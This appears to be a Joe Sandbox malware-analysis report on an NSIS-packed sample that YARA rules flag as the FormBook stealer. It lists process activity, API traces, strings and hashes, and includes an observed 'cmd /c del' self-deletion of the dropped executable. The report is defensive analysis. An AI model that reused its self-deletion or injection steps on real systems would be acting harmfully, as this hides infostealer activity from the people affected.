MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	12:34:34
Start date:	03/11/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe
Imagebase:	0xde0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	12:34:37
Start date:	03/11/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:34:37
Start date:	03/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:33:04
Start date:	03/11/2023
Path:	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca
Imagebase:	0x7ff6b84d0000
File size:	21'504 bytes
MD5 hash:	7F4A25126DC7ABB0A94B1BC62587AF37
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	17.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.8%
Total number of Nodes:	1278
Total number of Limit Nodes:	23

Executed Functions

Function 0040312A Relevance: 84.3, APIs: 27, Strings: 21, Instructions: 315
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403150
GetVersion.KERNEL32 ref: 00403156
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
#17.COMCTL32(0000000B,0000000D), ref: 004031A0
OleInitialize.OLE32(00000000), ref: 004031A7
SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
GetCommandLineA.KERNEL32(ylpuxzibyo Setup,NSIS Error), ref: 004031D8
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",00000000), ref: 004031EB
CharNextA.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",00409168), ref: 00403216
GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004032C2
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004032CE
DeleteFileA.KERNELBASE(1033), ref: 004032E5

Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84

ExitProcess.KERNEL32(00000020), ref: 00403361
OleUninitialize.OLE32(00000020), ref: 00403366
ExitProcess.KERNEL32 ref: 00403386
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",00000000,00000020), ref: 00403399
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00409148,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",00000000,00000020), ref: 004033A8
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",00000000,00000020), ref: 004033B3
lstrcmpiA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033BF
SetCurrentDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 004033DB
DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
CopyFileA.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,00428C58,00000001), ref: 00403439
CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
ExitProcess.KERNEL32 ref: 0040353A

Strings

, xrefs: 0040314B
~nsu, xrefs: 00403391
SeShutdownPrivilege, xrefs: 004034D1
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004032A2, 004032A7, 004032C1, 004032CD, 00403396, 004033A7, 004033B2, 004033BE, 004033CB, 004033DA, 0040347A
NSIS Error, xrefs: 004031C9
NCRC, xrefs: 00403258
_?=, xrefs: 0040330F
ylpuxzibyo Setup, xrefs: 004031CE
C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe, xrefs: 00403434
C:\Users\user\Desktop, xrefs: 004033B8, 004033BD, 004033E9
C:\Users\user~1\AppData\Local\Temp, xrefs: 00403343
", xrefs: 00403238
mo, xrefs: 00403413, 0040344A
UXTHEME, xrefs: 00403173, 00403178, 0040317E
1033, xrefs: 004032E0
/D=, xrefs: 00403270
\Temp, xrefs: 004032C8
"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe", xrefs: 004031DE, 004031E4, 00403305
.tmp, xrefs: 004033AD
C:\Users\user~1\AppData\Local\Temp, xrefs: 00403298, 00403338, 004033E1, 004033EA
Error launching installer, xrefs: 0040331E

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
String ID: $ /D=$ _?=$ mo$"$"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$ylpuxzibyo Setup$~nsu
API String ID: 1031542678-954327099
Opcode ID: 86d32bbf67157276347dd15ba2004fb4ddc1ee64470de8bb5c85f9652657bc9c
Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
Opcode Fuzzy Hash: 86d32bbf67157276347dd15ba2004fb4ddc1ee64470de8bb5c85f9652657bc9c
Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004054EC Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040550A
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*,\*.*,C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 00405554
lstrcatA.KERNEL32(?,00409010,?,C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 00405575
lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040557B
FindFirstFileA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*,?,?,?,00409010,?,C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040558C
FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040563E
FindClose.KERNELBASE(?), ref: 0040564F

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 004054F6
"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe", xrefs: 004054EC
C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*, xrefs: 0040553E, 00405544, 00405553, 00405589
\*.*, xrefs: 0040554E

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsa91F7.tmp\*.*$\*.*
API String ID: 2035342205-3669090619
Opcode ID: 40143870f9552ccee50e4944eef29081e6212fcf3057c5d2d5961ee8f08c50da
Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
Opcode Fuzzy Hash: 40143870f9552ccee50e4944eef29081e6212fcf3057c5d2d5961ee8f08c50da
Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405EC2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE(?,0042C0F0,C:\,004057DE,C:\,C:\,00000000,C:\,C:\,?,?,?,00405500,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 00405ECD
FindClose.KERNEL32(00000000), ref: 00405ED9

Strings

C:\, xrefs: 00405EC2

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA

Uniqueness

Uniqueness Score: -1.00%

Function 004039B0 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
ShowWindow.USER32(?), ref: 00403A09
DestroyWindow.USER32 ref: 00403A1D
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A39
GetDlgItem.USER32(?,?), ref: 00403A5A
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6E
IsWindowEnabled.USER32(00000000), ref: 00403A75
GetDlgItem.USER32(?,00000001), ref: 00403B23
GetDlgItem.USER32(?,00000002), ref: 00403B2D
SetClassLongA.USER32(?,000000F2,?), ref: 00403B47
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B98
GetDlgItem.USER32(?,00000003), ref: 00403C3E
ShowWindow.USER32(00000000,?), ref: 00403C5F
EnableWindow.USER32(?,?), ref: 00403C71
EnableWindow.USER32(?,?), ref: 00403C8C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
EnableMenuItem.USER32(00000000), ref: 00403CA9
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC1
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD4
lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,ylpuxzibyo Setup), ref: 00403CFD
SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
ShowWindow.USER32(?,0000000A), ref: 00403E40

Strings

ylpuxzibyo Setup, xrefs: 00403CEE

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: ylpuxzibyo Setup
API String ID: 184305955-784736266
Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040361A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84

lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user~1\AppData\Local\Temp\,?,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",00000000), ref: 0040368B
lstrlenA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,?,?,?,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,00000000,C:\Users\user~1\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user~1\AppData\Local\Temp\), ref: 00403700
lstrcmpiA.KERNEL32(?,.exe), ref: 00403713
GetFileAttributesA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ), ref: 0040371E
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user~1\AppData\Local\Temp), ref: 00403767

Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32

RegisterClassA.USER32 ref: 004037AE
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037FF
ShowWindow.USER32(00000005,00000000), ref: 00403835
GetClassInfoA.USER32(00000000,RichEdit20A,0042E3C0), ref: 00403861
GetClassInfoA.USER32(00000000,RichEdit,0042E3C0), ref: 0040386E
RegisterClassA.USER32(0042E3C0), ref: 00403877
DialogBoxParamA.USER32(?,00000000,004039B0,00000000), ref: 00403896

Strings

RichEd32, xrefs: 00403849
RichEd20, xrefs: 0040383B
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403626
.exe, xrefs: 0040370D
"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" , xrefs: 004036CE, 004036D6, 004036E3, 0040372D, 00403733
mo, xrefs: 00403620
_Nb, xrefs: 004037BD, 004037C2
RichEdit20A, xrefs: 00403859, 0040385F
.DEFAULT\Control Panel\International, xrefs: 00403676
1033, xrefs: 0040363A, 00403686
Control Panel\Desktop\ResourceLocale, xrefs: 0040364E
RichEdit, xrefs: 00403868
"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe", xrefs: 0040361E
C:\Users\user~1\AppData\Local\Temp, xrefs: 0040369A, 004036A2, 0040373A, 00403740, 00403750

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: mo$"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" $"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-3631607734
Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C55 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C66
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,00000400), ref: 00402C82

Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,80000000,00000003), ref: 004058A2
Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,80000000,00000003), ref: 00402CCE

Strings

C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
Inst, xrefs: 00402D3A
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
Lno, xrefs: 00402E7B
mo, xrefs: 00402E42
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402C5F
"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe", xrefs: 00402C55
soft, xrefs: 00402D43
Null, xrefs: 00402D4C
Error launching installer, xrefs: 00402CA5

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: mo$"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Lno$Null$soft
API String ID: 4283519449-3357492638
Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E8E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EF5
GetTickCount.KERNEL32 ref: 00402F9C
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
wsprintfA.USER32 ref: 00402FD5
WriteFile.KERNELBASE(00000000,00000000,0041924B,7FFFFFFF,00000000), ref: 00403003

Strings

HLA, xrefs: 00402F4B
... %d%%, xrefs: 00402FCF
HLA, xrefs: 0040306B
ionAndSpinCount, xrefs: 00402F0F
uOA, xrefs: 00402F62, 00402F74

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
